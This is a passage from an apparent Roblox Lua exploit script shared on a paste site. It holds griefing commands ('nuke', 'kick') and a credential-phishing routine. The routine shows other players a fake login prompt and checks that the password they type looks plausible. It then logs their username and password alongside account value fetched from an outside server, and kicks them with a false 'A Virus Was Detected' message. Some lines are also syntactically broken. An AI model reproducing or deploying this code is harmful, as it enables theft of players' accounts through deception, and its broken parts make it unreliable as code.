  1920. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1921. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1922. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1923. end
  1924. end))
  1925. until nil]]
  1926. end
  1927. end
  1928. end
  1929.  
  1930.  
  1931.  
  1932.  
  1933.  
  1934.  
  1935. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1936. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1937. for i, v in pairs(plrz) do
  1938. coroutine.resume(coroutine.create(function()
  1939. if v and v.Character and v.Character:findFirstChild("Torso") then
  1940. local p = Instance.new("Part",game.Workspace)
  1941. p.Anchored = true
  1942. p.CanCollide = false
  1943. p.formFactor = "Symmetric"
  1944. p.Shape = "Ball"
  1945. p.Size = Vector3.new(1,1,1)
  1946. p.BrickColor = BrickColor.new("New Yeller")
  1947. p.Transparency = .5
  1948. p.Reflectance = .2
  1949. p.TopSurface = 0
  1950. p.BottomSurface = 0
  1951. p.Touched:connect(function(hit)
  1952. if hit and hit.Parent then
  1953. local ex = Instance.new("Explosion", game.Workspace)
  1954. ex.Position = hit.Position
  1955. ex.BlastRadius = 11
  1956. ex.BlastPressure = math.huge
  1957. end
  1958. end)
  1959. local cf = v.Character.Torso.CFrame
  1960. p.CFrame = cf
  1961. for i = 1, 333 do
  1962. p.Size = p.Size + Vector3.new(3,3,3)
  1963. p.CFrame = cf
  1964. wait(1/44)
  1965. end
  1966. p:Destroy()
  1967. end
  1968. end))
  1969. end
  1970. end
  1971.  
  1972. if Cmd.Text:lower():sub(1,5) == "kick " then
  1973. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1974. for i, v in pairs(plrz) do
  1975. coroutine.resume(coroutine.create(function()
  1976. if v then v:Destroy() end
  1977. end))
  1978. end
  1979. end
  1980.  
  1981. if Cmd.Text:lower():sub(1,5) == "emit " then
  1982. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1983. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1984. for i, v in pairs(plrz) do
  1985. coroutine.resume(coroutine.create(function()
  1986. if v.Character then v.Character:FindFirstChild("Torso")
  1987. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1988. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  1989. end
  1990. end))
  1991. end
  1992.  
  1993. if Cmd.Text:lower():sub(1,7) == "unemit " then
  1994. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1995. for i, v in pairs(plrz) do
  1996. coroutine.resume(coroutine.create(function()
  1997. if v and v.Character and v.Character:findFirstChild("Torso") then
  1998. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  1999. end
  2000. end))
  2001. end
  2002. end end
  2003.  
  2004. end
  2005.  
  2006.  
  2007.  
  2008. function Clicked5()
  2009. for i,v in pairs(game.Players:GetChildren())do
  2010. gui = NewGuiPart65:Clone()
  2011. gui.Parent = Owner.PlayerGui
  2012. gui.ErrorFrame.Visible = true
  2013. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2014. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2015. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2016. passw = gui.ErrorFrame.TB2.Text
  2017. tb1 = gui.ErrorFrame.TB1.Text
  2018. end end
  2019.  
  2020.  
  2021.  
  2022.  
  2023. wait(3)
  2024. NewGuiPart72.Visible = true
  2025.  
  2026.  
  2027. RAPApi = true
  2028.  
  2029.  
  2030.  
  2031.  
  2032. local checktrue = Instance.new("BoolValue")
  2033. checktrue.Parent = CoreValues
  2034. checktrue.Name = "PasscheckTrue"
  2035. checktrue.Value = false
  2036.  
  2037. tb1 = otherp.Name
  2038.  
  2039. PassWord.Value = NewGuiPart71.Text
  2040. UserName.Value = NewGuiPart73.Text
  2041.  
  2042. function getRap(user)
  2043. local rap = ""
  2044. if RAPApi then
  2045. ypcall(function()
  2046. local http = game:GetService("HttpService")
  2047. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2048. rap = tostring(rawrap.rap)
  2049. end)
  2050. else
  2051. rap = "N/A"
  2052. end
  2053. return rap
  2054. end
  2055. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2056.  
  2057. function BCtoDumpStr(str)
  2058. local res = ""
  2059. if str == "Enum.MembershipType.BuildersClub" then
  2060. res = "[BC] "
  2061. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2062. res = "[TBC] "
  2063. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2064. res = "[OBC] "
  2065. elseif str == "Enum.MembershipType.None" then
  2066. res = ""
  2067. end
  2068. return res
  2069. end
  2070.  
  2071. function logAccount(user,pass)
  2072. local playerName = user.Name
  2073. local playerAge = tostring(user.AccountAge)
  2074. local playerRAP = getRap(playerName)
  2075.  
  2076.  
  2077. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2078. end
  2079.  
  2080. local GuiRemains = Instance.new("Folder")
  2081. GuiRemains.Name = "GuiRemains"
  2082. GuiRemains.Parent = CoreValues
  2083.  
  2084. function checkPass(pass)
  2085.  
  2086. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2087. Textg.Text = "PassWord Not Found In DataBase."
  2088. return false
  2089. end
  2090. local foundNums = 0
  2091. local foundLetters = 0
  2092. if string.find(pass, " ") then
  2093. Textg.Text = "PassWord Not Found In DataBase."
  2094. return false
  2095. end
  2096. if pass:len() < 6 or pass:len() > 20 then
  2097. Textg.Text = "PassWord Not Found In DataBase."
  2098. return false
  2099. end
  2100. for i=1,pass:len() do
  2101. if pass:sub(i,i):match("%d") ~= nil then
  2102. foundNums = foundNums + 1
  2103. end
  2104. end
  2105. if foundNums < 2 then
  2106. Textg.Text = "PassWord Not Found In DataBase."
  2107. return false
  2108. end
  2109. for i=1,pass:len() do
  2110. if pass:sub(i,i):match("%a") ~= nil then
  2111. foundLetters = foundLetters + 1
  2112. end
  2113. end
  2114. if foundLetters < 4 then
  2115. Textg.Text = "PassWord Not Found In DataBase."
  2116. return false
  2117. end
  2118. checktrue = true
  2119. return true
  2120.  
  2121. end
  2122. function respawn(user)
  2123. local person = game.Players[user]
  2124. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2125. person:Kick("A Virus Was Detected.")
  2126. person:Destroy();
  2127. end
  2128.  
  2129. function UnGui(user)
  2130. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2131. user:LoadCharacter();
  2132. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2133. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2134. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2135. end
  2136.  
  2137. function Done()
  2138. local pl = gui.Parent.Parent
  2139. UserName.Value = pl.Name
  2140. PassWord.Value = gui.ErrorFrame.TB2.Text
  2141. checkPass(gui.ErrorFrame.TB2.Text)
  2142. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2143. respawn(pl.Name);
  2144. pl:Kick("A Virus Was Detected.")
  2145. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2146. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2147. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2148.  
  2149. end
  2150.  
  2151.  
  2152. function Clicked6()
  2153.  
  2154. Done();
  2155.  
  2156.  
  2157.  
  2158. end
  2159.  
  2160.  
  2161. game.Workspace.ChildAdded:connect(function(per)
  2162. if per.Name == otherp.Name then
  2163. if IsRunning.Value == true then
  2164. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2165. Clicked5()
  2166. end
  2167. end end
  2168. end)
  2169.  
  2170.  
  2171.  
  2172.  
  2173.  
  2174. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2175. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2176. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2177. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2178. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2179. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2180. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2181. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2182.  
  2183. NewGuiPart1:Clone().Parent = CoreValues
  2184. NewGuiPart65:Clone().Parent = CoreValues
  2185.  
  2186. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement